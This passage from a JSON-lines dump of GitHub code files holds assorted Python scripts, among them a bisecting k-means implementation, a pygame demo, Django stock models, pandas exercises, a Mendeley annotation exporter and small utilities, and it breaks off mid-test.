similarityMatrix.getrow(i).toarray()[0].ravel()\n top_indices = row.argsort()[-1]\n idx.append(top_indices + 1)\n return idx\n\n# normal kmeans algorithm\ndef kmeans(mat,matrix, index_list, k):\n \n init_centroids_index = index_list[:2]\n centroids = mat[[init_centroids_index[0],init_centroids_index[1]],:]\n for itr in range(25):\n print(\"Iteration \" + str(itr) + \"\\n\")\n idx = findCluster(matrix,centroids)\n centroids = findCentroids(matrix,idx)\n index_list1 = []\n index_list2 = []\n for i in range(len(idx)):\n if idx[i] == 1:\n index_list1.append(index_list[i])\n elif idx[i] == 2:\n index_list2.append(index_list[i])\n cluster1 = mat[index_list1,:]\n cluster2 = mat[index_list2,:]\n return index_list1, index_list2, cluster1, cluster2, centroids[0], centroids[1]\n\n\n#bisecting k-means algorithm \ndef bisect(mat, k):\n matrix = mat\n cluster_list = []\n index_list = []\n\n for i in range(mat.shape[0]):\n index_list.append(i)\n\n while len(cluster_list) < 
k:\n sse1 = 0\n sse2 = 0\n index_list1, index_list2, cluster1, cluster2, centroids1, centroids2 = kmeans(mat,matrix,index_list,2)\n for clusters in cluster1:\n sse1 += (euclidean(clusters.toarray(),centroids1.toarray()))**2\n for clusters in cluster2:\n sse2 += (euclidean(clusters.toarray(),centroids2.toarray()))**2 \n if sse1 < sse2:\n cluster_list.append(index_list1)\n index_list = index_list2\n matrix = cluster2\n else:\n cluster_list.append(index_list2)\n index_list = index_list1\n matrix = cluster1\n cluster_list.append(index_list)\n return cluster_list\n\n\n\n# matrix = csr_read(\"train.dat\")\n# mat2 = csr_idf(matrix, copy=True) # after idf \n# mat3 = csr_l2normalize(mat2, copy=True) # idf and normalize\n\n# output = [0]* matrix.shape[0]\n# k=7\n# svd = TruncatedSVD(n_components=500, n_iter=50, random_state=42,algorithm='arpack')\n# csrnorm_trunc=svd.fit_transform(mat3)\n# csrnorm_trunc= csr_matrix(csrnorm_trunc)\n# result = bisect(csrnorm_trunc,k)\n\n# for i in range(len(result)):\n# for j in range(len(result[i])):\n# output[result[i][j]] = i+1\n\n# print(\"Accuracy Score: \")\n# print(calinski_harabaz_score(matrix.toarray(),output))\n\n# if(k==7):\n# f = open(\"result_2.dat\", \"w\")\n# f.write(\"\\n\".join(map(lambda x: str(x), output)))\n# f.close()\n\nif __name__ == '__main__':\n log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n logging.basicConfig(level=logging.INFO, format=log_fmt)\n\n # not used in this stub but often useful for finding various files\n project_dir = Path(__file__).resolve().parents[2]\n\n # find .env automagically by walking up directories until it's found, then\n # load up the .env entries as environment variables\n load_dotenv(find_dotenv())\n\n main()\n","repo_name":"goelshivani321/Implementing-Bisecting-K-means-Algorithm-","sub_path":"src/models/train_model_v2.py","file_name":"train_model_v2.py","file_ext":"py","file_size_in_byte":6504,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"35854453904","text":"import pygame\npygame.init()\n\nWIDTH = 500\nHEIGHT = 500\n\nFPS = 20\n\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\n\nx, y = WIDTH // 2 , HEIGHT // 2\nstep = 20\nRAD = 25\n\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption(\"RED_BALL\")\n\nclock = pygame.time.Clock()\n\nfinished = False\nwhile not finished:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n finished = True\n screen.fill(WHITE)\n pygame.draw.circle(screen, RED, (x, y), RAD)\n\n\n pressed = pygame.key.get_pressed()\n if pressed[pygame.K_UP] and y - RAD - 15 >= 0: \n y -= step\n if pressed[pygame.K_DOWN] and y + RAD + 15 <= HEIGHT:\n y += step\n if pressed[pygame.K_LEFT] and x - RAD - 15 >= 0:\n x -= step\n if pressed[pygame.K_RIGHT] and x + RAD + 15 <= WIDTH:\n x += step\n \n \n pygame.display.flip()\npygame.quit()\n","repo_name":"SamSweet04/PP2","sub_path":"Lab7/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"20355674492","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom jsonfield import JSONField\nimport datetime\n\nfrom django.db import models\nfrom django.utils import timezone\n\nfrom stocks.backends import AlphavantageBackend\n\n\nclass BaseModel(models.Model):\n \"\"\"\n Base model that others can inherit to get some basic datetimes\n \"\"\"\n datetime_created = 
models.DateTimeField(auto_now_add=True)\n datetime_updated = models.DateTimeField(auto_now=True)\n is_active = models.BooleanField(default=True)\n\n class Meta:\n abstract = True\n\n\nclass Sector(BaseModel):\n \"\"\"\n Sector which we use to organize tickers/companies by\n \"\"\"\n name = models.CharField(max_length=255, blank=False)\n slug = models.SlugField(unique=True, blank=False)\n\n def __unicode__(self):\n return u\"%s\" % self.name\n\n\nclass Company(BaseModel):\n \"\"\"\n Company, might have multiple tickers based on exchange\n \"\"\"\n name = models.CharField(max_length=255, blank=False)\n description = models.TextField(blank=True)\n website_url = models.CharField(max_length=255, blank=True)\n tags = models.ManyToManyField(\"Tag\", blank=True)\n sector = models.ForeignKey(\"Sector\", null=True, blank=True)\n\n def __unicode__(self):\n return u\"%s\" % self.name\n\n\nclass Exchange(BaseModel):\n \"\"\"\n Exchange that Stocks trade on\n \"\"\"\n name = models.CharField(max_length=255, blank=False)\n symbol = models.CharField(max_length=10, blank=False)\n ticker_suffix = models.CharField(max_length=2, blank=True, default='')\n currency = models.ForeignKey('Currency', null=False, blank=False)\n\n def __unicode__(self):\n return u\"%s\" % self.symbol\n\n\nclass Currency(BaseModel):\n \"\"\"\n Currency that an exchange trades with\n \"\"\"\n name = models.CharField(max_length=255, blank=False)\n symbol = models.CharField(max_length=10, blank=False)\n character = models.CharField(max_length=1, blank=False)\n\n def __unicode__(self):\n return u\"%s (%s)\" % (self.symbol, self.symbol)\n\n\nclass Stock(BaseModel):\n \"\"\"\n A stock which belongs to a Company, trades on an Exchange\n \"\"\"\n ticker = models.CharField(max_length=10, blank=False)\n exchange = models.ForeignKey('Exchange', null=False, blank=False)\n company = models.ForeignKey('Company', null=False, blank=False)\n market_cap = models.BigIntegerField(default=0)\n\n # today's numbers\n previous_close = models.DecimalField(default=0.0, max_digits=10, decimal_places=2, null=True)\n open = models.DecimalField(default=0.0, max_digits=10, decimal_places=2, null=True)\n current = models.DecimalField(default=0.0, max_digits=10, decimal_places=2, null=True)\n volume = models.BigIntegerField(default=0, null=True)\n\n # calculated numbers\n daily_diff = models.DecimalField(default=0.0, max_digits=10, decimal_places=2, null=True)\n daily_diff_percent = models.DecimalField(default=0.0, max_digits=10, decimal_places=2, null=True)\n\n @property\n def full_ticker(self):\n if self.exchange.ticker_suffix:\n return \"%s.%s\" % (self.ticker, self.exchange.ticker_suffix)\n return self.ticker\n\n def save(self, *args, **kwargs):\n \"\"\"\n Calculates diffs\n \"\"\"\n if self.current and self.previous_close:\n self.daily_diff = self.current - self.previous_close\n self.daily_diff_percent = 100 * self.daily_diff / self.previous_close\n super(Stock, self).save(*args, **kwargs)\n\n def __unicode__(self):\n return u\"%s (%s)\" % (self.ticker, self.company.name)\n\n\nclass Tag(BaseModel):\n \"\"\"\n A company can be tagged with multiple tags that users can filter/search by\n \"\"\"\n name = models.CharField(max_length=255, blank=False)\n\n def __unicode__(self):\n return u\"%s\" % (self.name)\n\n\nclass TimeseriesResult(BaseModel):\n \"\"\"\n A saved timeseries for a stock based on time period & time interval\n \"\"\"\n\n TIME_PERIOD_CHOICES = (\n ('current', 'Current'),\n ('1d', 'One Day'),\n ('5d', 'Five Days'),\n ('2w', 'Two Weeks'),\n ('1m', 'One 
Month'),\n ('3m', 'Three Months'),\n ('1y', 'One Year'),\n ('max', 'Max Time Period'),\n )\n\n stock = models.ForeignKey('Stock', null=False, blank=False)\n time_period = models.CharField(\n max_length=7,\n choices=TIME_PERIOD_CHOICES,\n blank=False, null=False)\n result = JSONField()\n\n # determines if a result is stale based on when it was last updated\n def _result_is_stale(self):\n if self.datetime_updated and self.result:\n if self.time_period in [\"1d\", \"current\"] and self.datetime_updated > timezone.now() - datetime.timedelta(minutes=1):\n return False\n if self.time_period in [\"5d\", \"2w\"] and self.datetime_updated > timezone.now() - datetime.timedelta(minutes=15):\n return False\n if self.time_period in ['1m', '3m', '1y', 'max'] and self.datetime_updated > timezone.now() - datetime.timedelta(days=1):\n return False\n return True\n\n def get_updated_result(self):\n if self._result_is_stale():\n backend = AlphavantageBackend(self.stock.full_ticker)\n data = backend.get_result(self.time_period)\n self.result = data\n self.save()\n return self.result\n\n class Meta():\n unique_together = ((\"stock\", \"time_period\"),)\n\n def __unicode__(self):\n return u\"%s - %s\" % (self.stock.ticker, self.time_period)\n","repo_name":"thefedoration/chart-bud","sub_path":"src/stocks/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15816191892","text":"from fastapi import FastAPI\nimport asyncio\n\napp = FastAPI()\nx = [1] # a global variable x\n\n\n@app.get(\"/\")\ndef hello():\n return {\"message\": \"hello\", \"x\": x}\n\n\nasync def periodic():\n while True:\n # code to run periodically starts here\n x[0] += 1\n print(f\"x is now {x}\")\n # code to run periodically ends here\n # sleep for 3 seconds after running above code\n await asyncio.sleep(3)\n\n\n@app.on_event(\"startup\")\nasync def schedule_periodic():\n loop = asyncio.get_event_loop()\n loop.create_task(periodic())\n\n\nif __name__ == \"__main__\":\n import uvicorn\n\n uvicorn.run(app)\n","repo_name":"Zephyrsz/faskApiWorkshop","sub_path":"backend/backendtaskDemo2.py","file_name":"backendtaskDemo2.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26150905583","text":"import pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing\nfrom datetime import datetime,date\nfrom datetime import timedelta\nimport pandasql as pdsql\n\nfrom pandasql import sqldf\n\n#Keep good names for your variables lady\ndata=pd.read_csv('C:/Analytics/dataset/data_science_challenge_samp_18.csv')\ndata2=pd.read_csv('C:/Analytics/dataset/data_science_challenge_samp_18.csv')\n\ndata2['order_date']=pd.to_datetime(data2['order_date'])\ndata2['yyyy_w']=data2['order_date'].apply(lambda x: str(x.isocalendar()[0])+'-'+str(x.isocalendar()[1]))\n\n#here as well\nq1 =\"select cust_id,yyyy_w,sum(units_purchased)as total_purchased,sum(total_spend)as total_spent from data2 group by cust_id,yyyy_w;\"\nf1=pdsql.sqldf(q1)\n#print(f1)\ncats = ['a', 'b', 'c']\ndf4 = pd.DataFrame({'cat': ['a', 'b', 'a']})\n\n#use some methods please instead of a whole thing\ndummies = pd.get_dummies(df4, prefix='', prefix_sep='')\ndummies = dummies.T.reindex(cats).T.fillna(0)\n\n#try to create contants\nlane=[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17]\nprint(\"\")\ndummies=pd.get_dummies(data['lane_number'],prefix='', prefix_sep='')\ndummies = 
dummies.T.reindex(lane).T.fillna(0)\n#print(dummies)\n\n#print(data)\n#print(type(data))\n#print(type(dummies))\noriginal=pd.concat([data,dummies], axis=1)\n\n#print(original)\ndata['order_date']=pd.to_datetime(data['order_date'])\ndata['yyyy_w']=data['order_date'].apply(lambda x: str(x.isocalendar()[0])+'-'+str(x.isocalendar()[1]))\n\n#print(data)\n#data['visit']\n\n\nstart_date = min(data['order_date'])\nend_date = max(data['order_date'])\n#print(str(start_date))\n#print(str(datetime.now()+timedelta(4)))\ndates= [ start_date + timedelta(n) for n in range(int ((end_date - start_date).days))]\n#print(int ((end_date - start_date).days))\n#print(type(dates))\n#dates=pd.to_datetime(data['dates'])\n#dates=dates.to_frame()\ndf3=pd.DataFrame(np.array(dates))\ndf3.columns=['order_date']\n#print(df3)\n#print(type(df3))\ndf4=data.head(10)\nq2 =\"select distinct df3.order_date, df4.cust_id from df3, df4;\"\n\nf2=pdsql.sqldf(q2)\nprint('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&')\nprint(f2.loc(0,'order_date'))\nf2['order_date']=pd.to_datetime(f2['order_date'])\n#print(f2)\n#print(df4)\n#print(df4.cust_id)\n#q3= \"select * from df4 left join f2 on df4.order_date=f2.order_date where df4.cust_id=f2.cust_id; \"\n#f3=pdsql.sqldf(q3)\n#print(f3)\nf3=f2.head(10)\nprint (f3)\n\nprint('****************************************')\n\n#df4['order_date']=pd.to_datetime(df4['order_date'])\nprint(df4)\nprint('***************************************')\nresult=pd.merge(f3,df4, on=['cust_id','order_date'], how='left')\nprint (result.head(500));\nresult.to_csv('C:/Analytics/dataset/test2.csv', sep=',' )\n#for index, row in df.iterrows():\nleft1 = pd.DataFrame({'key': ['K0', 'K1', 'K54', 'K3','k4','K0'],\n 'A': ['A0', 'A1', 'A2', 'A3','A4','A1'],\n 'B': ['B0', 'B1', 'B2', 'B3','B4','B5']})\n \n\nprint(left1)\nright1 = pd.DataFrame({'key': ['K0', 'K0', 'K21', 'K3'],\n 'A': ['A0', 'A1', 'A2', 'A3'],\n 'C': ['C0', 'C1', 'C2', 'C3'],\n 'D': ['D0', 'D1', 'D2', 'D3']})\n\nprint(right1)\n\nresult=pd.merge(left1,right1, on=['key','A'], how='left')\nprint(result)\n\n\n\n\n \n\n","repo_name":"Akanksharajp/titanic","sub_path":"DataProcessor.py","file_name":"DataProcessor.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11828600545","text":"import os\nimport random\nimport numpy as np\nimport torch\n\n\ndef set_all_seeds(seed):\n os.environ[\"PL_GLOBAL_SEED\"] = str(seed)\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n\n\ndef set_deterministic():\n if torch.cuda.is_available():\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n torch.set_deterministic(True)\n","repo_name":"rasbt/deeplearning-models","sub_path":"pytorch_ipynb/helper_utils.py","file_name":"helper_utils.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":16055,"dataset":"github-code","pt":"3"} +{"seq_id":"31189208420","text":"#!/usr/bin/python3\n\nimport PIL\nfrom PIL import Image\nimport os\n\nwhile True:\n file_path = input(\"Enter image file path: \")\n ext = os.path.splitext(file_path)[-1].lower()\n pil_image = PIL.Image.open(file_path)\n if ext == \".png\":\n pilimg = PIL.Image.open(file_path)\n wid, hei = pilimg.size\n image_res = str(wid)+\"x\"+str(hei)\n if image_res == \"100x100\":\n break\n else:\n print()\n print(\"Image must be 100x100 pixels.\")\n else:\n print()\n print(\"Invalid file. 
Select a .png image.\")\n\npixelarray = [0, 0]\n\ncolor0 = []\ncolor1 = []\ncolor2 = []\ncolor3 = []\ncolor4 = []\ncolor5 = []\n\nwhile pixelarray <= [99, 99]:\n current_pixel = (pixelarray[0], pixelarray[1])\n pixel_color = pil_image.getpixel(current_pixel)\n if pixel_color[0] >= 0 and pixel_color[0] <= 42:\n color0.append(current_pixel)\n print(\"appended1\")\n elif pixel_color[0] >= 43 and pixel_color[0] <= 84:\n color1.append(current_pixel)\n print(\"appended2\")\n elif pixel_color[0] >= 85 and pixel_color[0] <= 126:\n color2.append(current_pixel)\n elif pixel_color[0] >= 127 and pixel_color[0] <= 168:\n color3.append(current_pixel)\n elif pixel_color[0] >= 168 and pixel_color[0] <= 210:\n color4.append(current_pixel)\n elif pixel_color[0] >= 211 and pixel_color[0] <= 255:\n color5.append(current_pixel)\n\n if pixelarray[0] < 99:\n pixelarray[0] += 1\n elif pixelarray[1] == 99:\n break\n else:\n pixelarray[1] += 1\n pixelarray[0] = 0\n\n print(pixelarray)\n\nprint(\"------------------------ color0 ------------------------\")\nprint(color0)\nprint()\n\nprint(\"------------------------ color1 ------------------------\")\nprint(color1)\nprint()\n\nprint(\"------------------------ color2 ------------------------\")\nprint(color2)\nprint()\n\nprint(\"------------------------ color3 ------------------------\")\nprint(color3)\nprint()\n\nprint(\"------------------------ color4 ------------------------\")\nprint(color4)\nprint()\n\nprint(\"------------------------ color5 ------------------------\")\nprint(color5)\nprint()\n","repo_name":"Zbomb2000/Graphing-Image-Renderer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71697238801","text":"# /usr/bin/python\n# -*- coding: utf-8; py-indent-offset:4 -*-\nimport sys\nimport getopt\n\ndef showImageInHTML(imageTypes,savedir):\n files=getAllFiles(savedir+'/pic')\n images=[f for f in files if f[f.rfind('.')+1:] in imageTypes]\n images=[item for item in images if os.path.getsize(item)>5*1024]\n images=['pic'+item[item.rfind('/'):] for item in images]\n newfile='%s/%s'%(savedir,'images.html')\n with open(newfile,'w') as f:\n f.write('
<html><body>')\n        for image in images:\n            f.write(\"<img src='%s' />\\n\"%image)\n        f.write('</body></html>
')\n print('success,images are wrapped up in %s'%newfile)\n\nclass Usage(Exception):\n def __init__(self, msg):\n self.msg = msg\n\ndef main(argv=None):\n if argv is None:\n argv = sys.argv\n try:\n try:\n opts, args = getopt.getopt(argv[1:], \"h\", [\"help\"])\n except getopt.error:\n raise Usage(msg)\n except Usage:\n return 2\n\nif __name__ == \"__main__\":\n sys.exit(main())","repo_name":"4v/finstate","sub_path":"aaahtml.py","file_name":"aaahtml.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8332800198","text":"from __future__ import print_function\nimport sqlite3\ntry:\n from urllib.parse import unquote, urlparse\nexcept:\n from urlparse import urlparse\n from urllib import unquote\nimport os\nimport pdfannotation\nimport PyPDF2\nimport warnings\nfrom dateutil import parser as dtparser\n\nglobal OVERWRITE_PDFS\nOVERWRITE_PDFS = False\n\ndef convert2datetime(s):\n return dtparser.parse(s)\n\ndef converturl2abspath(url):\n \"\"\"Convert a url string to an absolute path\"\"\"\n try:\n pth = unquote(urlparse(url).path) #this is necessary for filenames with unicode strings\n except:\n pth = unquote(str(urlparse(url).path)).decode(\"utf8\") #this is necessary for filenames with unicode strings\n return os.path.abspath(pth)\n\ndef get_highlights_from_db(db, results={}):\n \"\"\"Extract the locations of highlights from the Mendeley database\n and put results into dictionary.\n\n Parameters\n ==========\n db : sqlite3.connection\n Mendeley sqlite database\n results : dict, optional\n Dictionary to hold the results. Default is an empty dictionary.\n\n Returns\n =======\n results : dict\n dictionary containing the query results\n \"\"\"\n query = \"\"\"SELECT Files.localUrl, FileHighlightRects.page,\n FileHighlightRects.x1, FileHighlightRects.y1,\n FileHighlightRects.x2, FileHighlightRects.y2,\n FileHighlights.createdTime, FileHighlights.color\n FROM Files\n LEFT JOIN FileHighlights\n ON FileHighlights.fileHash=Files.hash\n LEFT JOIN FileHighlightRects\n ON FileHighlightRects.highlightId=FileHighlights.id\n WHERE (FileHighlightRects.page IS NOT NULL)\"\"\"\n ret = db.execute(query)\n for r in ret:\n pth = converturl2abspath(r[0])\n pg = r[1]\n bbox = [[r[2], r[3], r[4], r[5]]]\n cdate = convert2datetime(r[6])\n color = r[7]\n hlight = {\"rect\": bbox, \"cdate\": cdate, \"color\": color}\n if pth in results:\n if pg in results[pth]:\n if 'highlights' in results[pth][pg]:\n results[pth][pg]['highlights'].append(hlight)\n else:\n results[pth][pg]['highlights'] = [hlight]\n else:\n results[pth][pg] = {'highlights': [hlight]}\n else:\n results[pth] = {pg: {'highlights':[hlight]}}\n return results\n\ndef get_notes_from_db(db, results={}):\n \"\"\"Extract notes from the Mendeley database\n and put results into dictionary.\n\n Parameters\n ==========\n db : sqlite3.connection\n Mendeley sqlite database\n results : dict, optional\n Dictionary to hold the results. 
Default is an empty dictionary.\n\n Returns\n =======\n results : dict\n dictionary containing the query results\n \"\"\"\n query = \"\"\"SELECT Files.localUrl, FileNotes.page,\n FileNotes.x, FileNotes.y,\n FileNotes.author, FileNotes.note,\n FileNotes.modifiedTime, FileNotes.color\n FROM Files\n LEFT JOIN FileNotes\n ON FileNotes.fileHash=Files.hash\n WHERE FileNotes.page IS NOT NULL\"\"\"\n ret = db.execute(query)\n for r in ret:\n pth = converturl2abspath(r[0])\n pg = r[1]\n bbox = [r[2], r[3], r[2]+30, r[3]+30] # needs a rectangle however size does not matter\n author = r[4]\n txt = r[5]\n cdate = convert2datetime(r[6])\n color = r[7]\n note = {\"rect\": bbox, \"author\": author, \"content\": txt, \"cdate\":cdate, \"color\": color}\n if pth in results:\n if pg in results[pth]:\n if 'notes' in results[pth][pg]:\n results[pth][pg]['notes'].append(note)\n else:\n results[pth][pg]['notes'] = [note]\n else:\n results[pth][pg] = {'notes': [note]}\n else:\n results[pth] = {pg: {'notes':[note]}}\n return results\n\ndef add_annotation2pdf(inpdf, outpdf, annotations):\n for pg in range(1, inpdf.getNumPages()+1):\n inpg = inpdf.getPage(pg-1)\n if pg in annotations.keys():\n if 'highlights' in annotations[pg]:\n for hn in annotations[pg]['highlights']:\n if hn['color'] is not None:\n annot = pdfannotation.highlight_annotation(hn[\"rect\"], cdate=hn[\"cdate\"], color=hn[\"color\"])\n else:\n annot = pdfannotation.highlight_annotation(hn[\"rect\"], cdate=hn[\"cdate\"])\n pdfannotation.add_annotation(outpdf, inpg, annot)\n if 'notes' in annotations[pg]:\n for nt in annotations[pg]['notes']:\n if nt['color'] is not None:\n note = pdfannotation.text_annotation(nt[\"rect\"], contents=nt[\"content\"], author=nt[\"author\"],\n color=nt[\"color\"], cdate=nt[\"cdate\"])\n else:\n note = pdfannotation.text_annotation(nt[\"rect\"], contents=nt[\"content\"], author=nt[\"author\"],\n cdate=nt[\"cdate\"])\n pdfannotation.add_annotation(outpdf, inpg, note)\n outpdf.addPage(inpg)\n return outpdf\n\ndef processpdf(fn, fn_out, annotations):\n try:\n inpdf = PyPDF2.PdfFileReader(open(fn, 'rb'), strict=False)\n if inpdf.isEncrypted:\n # PyPDF2 seems to think some files are encrypted even\n # if they are not. 
We just ignore the encryption.\n # This seems to work for the one file where I saw this issue\n inpdf._override_encryption = True\n inpdf._flatten()\n except IOError:\n print(\"Could not find pdffile %s\"%fn)\n return\n outpdf = PyPDF2.PdfFileWriter()\n outpdf = add_annotation2pdf(inpdf, outpdf, annotations)\n if os.path.isfile(fn_out):\n if not OVERWRITE_PDFS:\n print(\"%s exists skipping\"%fn_out)\n return\n else:\n print(\"overwriting %s\"%fn_out)\n else:\n print(\"writing pdf to %s\"%fn_out)\n outpdf.write(open(fn_out, \"wb\"))\n\ndef mendeley2pdf(fn_db, dir_pdf):\n db = sqlite3.connect(fn_db)\n highlights = get_highlights_from_db(db)\n annotations_all = get_notes_from_db(db, highlights)\n for fn, annons in annotations_all.items():\n try:\n processpdf(fn, os.path.join(dir_pdf, os.path.basename(fn)), annons)\n except PyPDF2.utils.PdfStreamError:\n print(\"I appear to have run out of things to join together on %s.\"%fn)\n pass\n except PyPDF2.utils.PdfReadError:\n print(\"I appear to have run out of things to read on %s.\"%fn)\n pass\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument(\"mendeleydb\", help=\"The mendeley sqlite database file\",\n type=str)\n parser.add_argument(\"dest\", help=\"\"\"The destination directory where to\n save the annotated pdfs\"\"\", type=str)\n parser.add_argument(\"-w\", \"--overwrite\", help=\"\"\"Overwrite any PDF files in\n the destination directory\"\"\", action=\"store_true\")\n args = parser.parse_args()\n fn = os.path.abspath(args.mendeleydb)\n dir_pdf = os.path.abspath(args.dest)\n if args.overwrite:\n OVERWRITE_PDFS = True\n mendeley2pdf(fn, dir_pdf)\n","repo_name":"cycomanic/Menextract2pdf","sub_path":"src/menextract2pdf.py","file_name":"menextract2pdf.py","file_ext":"py","file_size_in_byte":7615,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"3"} +{"seq_id":"24812329230","text":"class Solution:\n def minAreaRect(self, points: List[List[int]]) -> int:\n \n n = len(points)\n nx = len(set(x for x, y in points))\n ny = len(set(y for x, y in points))\n \n # Edge case - no rectangles can be made.\n if nx == n or ny == n:\n return 0\n \n point_map = collections.defaultdict(list)\n \n # Grab list of points with same x or y value based on whichever one has more\n # Because we'll eventually loop through every possible combination in this array,\n # we want it to have as little values as possible. So if we have more x values,\n # We'll make the array from the y values. \n if nx > ny:\n for x, y in points:\n point_map[x].append(y)\n \n else:\n for x, y, in points:\n point_map[y].append(x)\n \n # This hash will hold the very last x value we've seen for any y1, y2 pair with the same x value\n # Because the smallest area of the rectangle in a sorted list of x values is the current + the last one\n # we saw. 
So we can \"forget\" any that we've seen before that because those areas will be larger.\n lastx = {}\n \n ans = float('inf')\n \n # Sort x values from lowest to highest then iterate through them\n for x in sorted(point_map):\n # Sort the y values because lower values = less area\n point_map[x].sort()\n # Loop through each of those y values\n for i in range(len(point_map[x])):\n # Loop up to that point for possible combos\n for j in range(i):\n # Initialize variables\n y1, y2 = point_map[x][i], point_map[x][j]\n \n # If we've seen this combo of y values with a different x value before,\n # then we can make a rectangle from this\n if (y1, y2) in lastx:\n # Calculate area and choose lesser value\n ans = min(ans, (x - lastx[y1, y2]) * abs(y1 - y2) )\n \n # Then set this into the lastx\n lastx[y1, y2] = x\n \n return ans if ans < float('inf') else 0","repo_name":"PigsGoMoo/LeetCode","sub_path":"minimum-area-rectangle/minimum-area-rectangle.py","file_name":"minimum-area-rectangle.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5143092342","text":"\"Another simple primal infeasible example\"\nfrom gpkit import Variable, Model\n\nx = Variable(\"x\")\ny = Variable(\"y\", 2)\n\nconstraints = [\n x >= 1,\n 0.5 <= x*y,\n x*y <= 1.5\n ]\n\nobjective = x*y\nm = Model(objective, constraints)\n\n# raises UnknownInfeasible on cvxopt and PrimalInfeasible on mosek\n# m.solve()\n","repo_name":"convexengineering/gpkit","sub_path":"docs/source/examples/primal_infeasible_ex2.py","file_name":"primal_infeasible_ex2.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":200,"dataset":"github-code","pt":"3"} +{"seq_id":"37202006549","text":"# -*- coding:utf-8 -*-\n\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\n# 创建一个Series数组,生成1000个随机标准正态分布���浮点数,索引是时间序列\nts = pd.Series(np.random.randn(1000), index=pd.date_range('1/1/2000', periods=1000))\nprint(ts)\nprint('*' * 100)\n\n# 求累加值\nts = ts.cumsum()\nprint(ts)\nprint('*' * 100)\n\n# 我们可以使用 plt.plot(x=, y=),把x,y的数据作为参数存进去,\n# 但是ts本来就是一个数据,所以我们可以直接plot\n# 上面的Series数组第一列index就是X坐标,第二列就是对应的值\nts.plot()\n\n# 同样可以使用plt传入各种图形设置\n# 默认为选取最优化的设置\n\nplt.show()","repo_name":"FelixZFB/Python_data_analysis","sub_path":"001_Python_from_introduction_to_practice/009_pandas_matplotlib_绘图接口/001_pandas_Series数据_plot绘制折线图.py","file_name":"001_pandas_Series数据_plot绘制折线图.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71845833040","text":"def primo(number):\r\n \"\"\"\r\n It return a boolean value, True if de number os prime, False is the number is not prime\r\n \"\"\"\r\n primo = True\r\n for i in range(2, number): # o divisor varia entre 2 e o numero-1\r\n resto = number % i\r\n if resto == 0: # quando encontro um resto 0 => não é primo\r\n primo = False\r\n break\r\n return primo\r\n\r\n\r\nnumber = int(input(\"Indicate a number:\"))\r\nestado = primo(number)\r\nif estado==True:\r\n print(\"O numero {0} é primo\" .format(number))\r\nelse:\r\n print(\"O numero {0} não é primo\" .format(number))\r\n\r\n","repo_name":"mariopinto18/ESMAD-AED-23-24","sub_path":"Ficha 04/Exemplo1.py","file_name":"Exemplo1.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4833104903","text":"#!python\n\nfrom 
datawire.utils import DataWireResult\nfrom datawire.utils.random import DataWireRandom\n\ndef checkStringify(name, dwr, wanted):\n stringified = u\"%s\" % dwr\n\n if stringified != wanted:\n print(\"\\n! %s: %s\" % (name, repr(stringified)))\n print(\" %s %s\" % (' ' * len(name), repr(wanted)))\n\n assert stringified == wanted\n\nclass TestDWUtils (object):\n def test_result(self):\n r1 = DataWireResult(ok=True, alpha=\"Alice\", beta=True)\n assert r1\n checkStringify(\"r1\", r1, u\"\")\n\n r2 = DataWireResult(ok=False, error='Error String Here')\n assert not r2\n checkStringify(\"r2\", r2, u\"\")\n\n r2a = DataWireResult(ok=False, error=\"Error String Here\", extraThing=\"badness\")\n assert not r2a\n checkStringify(\"r2a\", r2a, u\"\")\n\n r2b = DataWireResult.fromError(\"Error String Here\")\n assert not r2b\n checkStringify(\"r2b\", r2b, u\"\")\n\n r2c = DataWireResult.fromError(\"Error String Here\", errorReturn=503)\n assert not r2c\n checkStringify(\"r2c\", r2c, u\"\")\n\n r3 = DataWireResult.fromErrorAndResults(alpha=\"Alice\", beta=True)\n assert r3\n checkStringify(\"r3\", r3, u\"\")\n\n r4 = DataWireResult.fromErrorAndResults(error=\"Error String Here\")\n assert not r4\n checkStringify(\"r4\", r4, u\"\")\n\n r4a = DataWireResult.fromErrorAndResults(error=\"Error String 